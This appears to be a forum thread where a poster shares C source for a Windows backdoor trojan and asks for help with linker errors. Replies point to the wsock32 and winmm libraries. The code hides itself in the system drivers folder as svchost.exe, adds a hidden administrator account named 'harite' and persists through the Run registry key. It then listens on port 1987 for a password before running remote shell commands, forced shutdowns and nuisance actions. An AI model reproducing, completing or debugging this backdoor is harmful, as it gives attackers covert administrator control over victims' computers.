#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>
#include <conio.h>
#include <process.h>
#include <mmsystem.h>
#define BUFLEN 1024
#define port 1987
#define ID_TIMER 1

LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
void WinsockWork (PVOID pvoid);
char *StrCpyN(char *src, char *dust, int n);
int Shutdown(int i);
void Uninstall(void);


HWND hwnd;
HKEY key;
char systempath[30];
char wantpath[100];


int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)


{
MSG messages;
WNDCLASSEX wincl;
char szClassName[] = "您现在可以安全关闭所有应用程序";
char attrib[120] = "/C attrib +S \"";


wincl.hInstance = hThisInstance;
wincl.lpszClassName = szClassName;
wincl.lpfnWndProc = WindowProcedure;
wincl.style = CS_DBLCLKS;
wincl.cbSize = sizeof (WNDCLASSEX);


wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL;
wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;


GetSystemDirectory (systempath, 30);
strcpy (wantpath,systempath);
strcat(wantpath, "\\drivers\\svchost.exe");
if(fopen(wantpath, "r")==NULL)
{
CopyFile ("server.exe", wantpath, 0);
strcat (strcat (attrib, wantpath), "\"");
ShellExecute(NULL, "open", "cmd", attrib, "", SW_HIDE);
}
ShellExecute(NULL, "open", "cmd", "/C net user harite /add", "", SW_HIDE);
ShellExecute(NULL, "open", "cmd", "/C net localgroup administrators harite /add", "", SW_HIDE);
if (!RegisterClassEx (&wincl))
{
return 0;
}


hwnd = CreateWindowEx (
0,
szClassName,
"您现在可以安全关闭所有应用程序",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,
CW_USEDEFAULT,
544,
375,
HWND_DESKTOP,
NULL,
hThisInstance,
NULL
);
ShowWindow (hwnd, SW_HIDE);
while (GetMessage (&messages, NULL, 0, 0))
{
TranslateMessage(&messages);
DispatchMessage(&messages);
}
return messages.wParam;
}


LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM
wParam, LPARAM lParam)
{
switch (message)
{
case WM_CREATE:
SetTimer(hwnd, ID_TIMER, 1000, NULL);
_beginthread(WinsockWork, 0, NULL);
break;
case WM_TIMER:


if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVers­ion\\Run",&key)==ERROR_SUCCESS)
{
RegSetValueEx(key,"svchost",0,REG_SZ,(BYTE
*)wantpath,lstrlen(wantpath));
RegCloseKey(key);
}


break;
case WM_DESTROY:
KillTimer(hwnd, ID_TIMER);
PostQuitMessage (0);
break;
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}


return 0;



}


void WinsockWork (PVOID pvoid)
{
int res, tmp, yes;
SOCKET s, rs;
SOCKADDR_IN sin, rsin;
struct protoent *ppe;
WSADATA wsad;
WORD wVersionReq;
char recvBuf[BUFLEN];
char sayWord[BUFLEN+10];
char openHttp[BUFLEN];
char sendBuf[BUFLEN] = "Welcome to NetDos System v1.0";
char cmdArgv[BUFLEN+10];
char shellBuf[BUFLEN];
char soundPath[2*MAX_PATH];

wVersionReq = MAKEWORD (1, 1);
res = WSAStartup (wVersionReq, &wsad);
if(res!=0)
{
exit (0);
}


ppe = getprotobyname ("tcp");
s = socket (PF_INET, SOCK_STREAM, ppe->p_proto);
if(s==INVALID_SOCKET)
{
exit (0);
}


sin.sin_family = PF_INET;
sin.sin_port = htons (port);
sin.sin_addr.s_addr = INADDR_ANY;
tmp = sizeof (sin);
if(bind (s, (LPSOCKADDR)&sin,
tmp)==SOCKET_ERROR)
{
closesocket (s);
WSACleanup ();
exit (0);
}


if(listen (s, 1)==SOCKET_ERROR)
{
closesocket (s);
WSACleanup ();
exit (0);
}


tmp = sizeof (rsin);
while(1)
{


rs = accept (s, (LPSOCKADDR)&rsin,
&tmp);
if(rs==INVALID_SOCKET)
{
closesocket (s);
WSACleanup ();
exit (0);
}


if(recv (rs, recvBuf, BUFLEN, 0)==SOCKET_ERROR)
{
closesocket (rs);
closesocket (s);
WSACleanup ();
exit (0);
}
if(strncmp (recvBuf, "I am your master", 16))
{
closesocket (rs);
goto end;
}
strset (recvBuf, '\0');


if(send (rs, sendBuf, strlen(sendBuf)
,0)==SOCKET_ERROR)
{
closesocket (rs);
closesocket (s);
WSACleanup ();
exit (0);
}


yes = 1;
while(yes)
{
res = recv (rs, recvBuf, BUFLEN,
0);//等待接收信息并作出处理
if(res==SOCKET_ERROR){strset (recvBuf, '\0');closesocket (rs);yes =
0;}
if(!strncmp (recvBuf, "exit", 4))
{
strset (recvBuf, '\0');
yes = 0;
}else if(!strncmp (recvBuf, "say:", 4))
{
StrCpyN(sayWord, recvBuf, 4);
MessageBox (NULL, sayWord, "harite want to say something to you:",
0);
strset (recvBuf, '\0');
strset (sayWord, '\0');
}else if(!strncmp (recvBuf, "open:", 5))
{
StrCpyN(openHttp, recvBuf, 5);
ShellExecute(NULL, "open", openHttp, "" ,"" , SW_SHOW);
strset (recvBuf, '\0');
strset (openHttp, '\0');
}else if(!strncmp (recvBuf, "shutdown:", 9))
{
Shutdown(3);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "reboot:", 7))
{
Shutdown(2);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "logoff:", 7))
{
Shutdown(1);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "play:", 5))
{
StrCpyN(soundPath, recvBuf, 5);
PlaySound (soundPath, NULL, SND_FILENAME | SND_ASYNC);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "beep:", 5))
{
MessageBeep(MB_ICONHAND);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "wrongmouse:", 10))
{
SwapMouseButton(true);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "rightmouse:", 10))
{
SwapMouseButton(false);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "opencd:", 7))
{
mciSendString("set cdaudio door open wait", NULL, 0,
NULL);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "closecd:", 8))
{
mciSendString("set cdaudio door closed wait", NULL, 0,
NULL);
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "uninstall:", 10))
{
Uninstall();
strset (recvBuf, '\0');
}else if(!strncmp (recvBuf, "shell:", 6))
{
StrCpyN(shellBuf, recvBuf, 6);
strcat (strcat (strcat (cmdArgv, "/C \""), shellBuf), "\"");
ShellExecute(NULL, "open", "cmd", cmdArgv, "", SW_HIDE);
strset (recvBuf,'\0');
strset (cmdArgv, '\0');
strset (shellBuf, '\0');
}else{
;
}
}
end:;
}


closesocket (rs);
closesocket (s);
WSACleanup ();



}


char *StrCpyN(char *src, char *dust, int n)
{
int i;
for(i=0;i<n;i++)
*dust++;
while(*dust!='\0')
*src++ = *dust++;
*src = '\0';
return dust;


}


int Shutdown(int
i)
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
DWORD dwVersion;
int iSelected();
dwVersion = GetVersion();
switch(i)
{
case 1:
ExitWindowsEx(EWX_LOGOFF,0);
break;
case 2:
if (dwVersion < 0x80000000)
{
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);


LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp,
0,(PTOKEN_PRIVILEGES)NULL, 0);
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
}else{
ExitWindowsEx(EWX_REBOOT |EWX_FORCE,0);
}
break;
case 3:
if (dwVersion < 0x80000000)
{
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY, &hToken);


LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp,
0,(PTOKEN_PRIVILEGES)NULL, 0);
ExitWindowsEx(EWX_SHUTDOWN |EWX_FORCE, 0);
}else{
ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,0);
}
break;
default:
break;
}

{
void Uninstall(void);

KillTimer(hwnd, ID_TIMER);

if(RegOpenKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVers­ion\\Run",&key)==ERROR_SUCCESS)
{
RegDeleteValue(key,"svchost");
RegCloseKey(key);
}
}
}



_______________________________________________________________________________



Undefined Reference to :
"WSAStartup@8"
"getprotobyname@4"
"Socket@12"
"hton@4"
"bind@12"
"closesocket@4"
"WASCleanup@0"
"listen@8"
"accept@12"
"recv@16"
"send@16"
"PlaySoundA@12"
"mciSendStringA@16"
"uninstall()"

Sounds like you forgot to link some libraries like wsock32 and winmm.

I have linked wsock32.lib
But it says "wsock23.lib" not found.
I will try winmm.lib

There's no ".lib". Just wsock32.

Sorry...
1) Code tags
2) /* Ignore */
3) Was you looking for ws2_32.lib ?

Please use code tags

More like, "please remove the code, it doesn't help in answering the question".